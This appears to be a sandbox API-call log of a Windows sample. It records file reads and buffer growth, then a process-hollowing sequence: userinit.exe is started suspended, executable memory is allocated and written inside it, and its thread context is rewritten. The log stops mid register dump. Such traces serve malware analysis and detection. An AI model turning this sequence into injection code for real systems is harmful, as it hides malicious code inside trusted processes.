[0188.396] SetFilePointer (in: hFile=0x138, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0188.396] SetFilePointer (in: hFile=0x138, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0188.396] SetFilePointer (in: hFile=0x138, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0188.397] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0188.397] ReadFile (in: hFile=0x138, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0188.403] CloseHandle (hObject=0x138) returned 1
[0188.403] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.404] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.404] GlobalUnlock (hMem=0x189000c) returned 0
[0188.404] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0188.404] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.405] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.405] GlobalUnlock (hMem=0x189000c) returned 0
[0188.405] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0188.405] GlobalLock (hMem=0x189000c) returned 0x25f110
[0188.406] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0188.406] GlobalUnlock (hMem=0x189000c) returned 0
[0188.406] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0188.406] GlobalLock (hMem=0x189000c) returned 0x265120
[0188.407] GlobalHandle (pMem=0x265120) returned 0x189000c
[0188.407] GlobalUnlock (hMem=0x189000c) returned 0
[0188.407] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0188.407] GlobalLock (hMem=0x189000c) returned 0x265120
[0188.408] GlobalHandle (pMem=0x265120) returned 0x189000c
[0188.408] GlobalUnlock (hMem=0x189000c) returned 0
[0188.408] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0188.408] GlobalLock (hMem=0x189000c) returned 0x26f130
[0188.409] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0188.409] GlobalUnlock (hMem=0x189000c) returned 0
[0188.409] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0188.409] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.410] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.410] GlobalUnlock (hMem=0x189000c) returned 0
[0188.410] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0188.410] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.410] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.410] GlobalUnlock (hMem=0x189000c) returned 0
[0188.410] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0188.410] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.411] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.411] GlobalUnlock (hMem=0x189000c) returned 0
[0188.411] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0188.411] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.412] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.412] GlobalUnlock (hMem=0x189000c) returned 0
[0188.412] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0188.412] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.413] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.413] GlobalUnlock (hMem=0x189000c) returned 0
[0188.413] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0188.413] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.413] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.413] GlobalUnlock (hMem=0x189000c) returned 0
[0188.413] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0188.413] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.414] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.414] GlobalUnlock (hMem=0x189000c) returned 0
[0188.414] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0188.414] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.415] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.415] GlobalUnlock (hMem=0x189000c) returned 0
[0188.415] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0188.415] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.416] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.416] GlobalUnlock (hMem=0x189000c) returned 0
[0188.416] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0188.416] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.416] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.416] GlobalUnlock (hMem=0x189000c) returned 0
[0188.416] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0188.418] GlobalLock (hMem=0x189000c) returned 0x27b110
[0188.418] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0188.418] GlobalUnlock (hMem=0x189000c) returned 0
[0188.418] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0188.418] GlobalLock (hMem=0x189000c) returned 0x27b110
[0188.419] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0188.419] GlobalUnlock (hMem=0x189000c) returned 0
[0188.419] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0188.421] GlobalLock (hMem=0x189000c) returned 0x29f120
[0188.421] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0188.421] GlobalUnlock (hMem=0x189000c) returned 0
[0188.421] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0188.421] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.422] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.422] GlobalUnlock (hMem=0x189000c) returned 0
[0188.422] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0188.422] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.423] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.423] GlobalUnlock (hMem=0x189000c) returned 0
[0188.423] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0188.423] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.424] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.424] GlobalUnlock (hMem=0x189000c) returned 0
[0188.424] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0188.424] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.424] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.424] GlobalUnlock (hMem=0x189000c) returned 0
[0188.424] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0188.424] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.425] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.425] GlobalUnlock (hMem=0x189000c) returned 0
[0188.425] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0188.425] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.426] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.426] GlobalUnlock (hMem=0x189000c) returned 0
[0188.426] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0188.426] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.427] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.427] GlobalUnlock (hMem=0x189000c) returned 0
[0188.427] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0188.427] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.428] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.428] GlobalUnlock (hMem=0x189000c) returned 0
[0188.428] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0188.428] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.428] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.428] GlobalUnlock (hMem=0x189000c) returned 0
[0188.429] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0188.429] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.429] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.429] GlobalUnlock (hMem=0x189000c) returned 0
[0188.429] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0188.429] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.430] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.430] GlobalUnlock (hMem=0x189000c) returned 0
[0188.430] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0188.430] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.431] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.431] GlobalUnlock (hMem=0x189000c) returned 0
[0188.431] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0188.431] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.431] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.431] GlobalUnlock (hMem=0x189000c) returned 0
[0188.431] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0188.431] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.432] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.432] GlobalUnlock (hMem=0x189000c) returned 0
[0188.432] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0188.432] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.433] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.433] GlobalUnlock (hMem=0x189000c) returned 0
[0188.433] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0188.433] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.434] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.434] GlobalUnlock (hMem=0x189000c) returned 0
[0188.434] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0188.434] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.434] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.434] GlobalUnlock (hMem=0x189000c) returned 0
[0188.434] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0188.434] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.435] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.435] GlobalUnlock (hMem=0x189000c) returned 0
[0188.435] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0188.435] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.436] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.436] GlobalUnlock (hMem=0x189000c) returned 0
[0188.436] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0188.436] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.436] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.436] GlobalUnlock (hMem=0x189000c) returned 0
[0188.436] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0188.437] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.437] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.437] GlobalUnlock (hMem=0x189000c) returned 0
[0188.437] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0188.437] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.438] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.438] GlobalUnlock (hMem=0x189000c) returned 0
[0188.438] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0188.438] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.439] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.439] GlobalUnlock (hMem=0x189000c) returned 0
[0188.439] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0188.439] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.439] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.439] GlobalUnlock (hMem=0x189000c) returned 0
[0188.439] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0188.439] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.440] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.440] GlobalUnlock (hMem=0x189000c) returned 0
[0188.440] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0188.440] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.441] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.441] GlobalUnlock (hMem=0x189000c) returned 0
[0188.441] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0188.441] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.489] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0188.489] GlobalUnlock (hMem=0x189000c) returned 0
[0188.489] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0188.489] GlobalLock (hMem=0x189000c) returned 0x25b100
[0188.489] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x134, hThread=0x138, dwProcessId=0x80c, dwThreadId=0x810)) returned 1
[0188.491] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0188.491] GetThreadContext (in: hThread=0x138, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0xcf2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x8f7f8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0188.535] ReadProcessMemory (in: hProcess=0x134, lpBaseAddress=0x7ffd8008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0188.535] VirtualAllocEx (hProcess=0x134, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0188.535] VirtualAlloc (lpAddress=0x1c90000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1c90000
[0188.540] WriteProcessMemory (in: hProcess=0x134, lpBaseAddress=0x400000, lpBuffer=0x1c8c918*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1c8c918*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0188.551] WriteProcessMemory (in: hProcess=0x134, lpBaseAddress=0x7ffd8008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0188.551] SetThreadContext (hThread=0x138, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x8f7f8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, 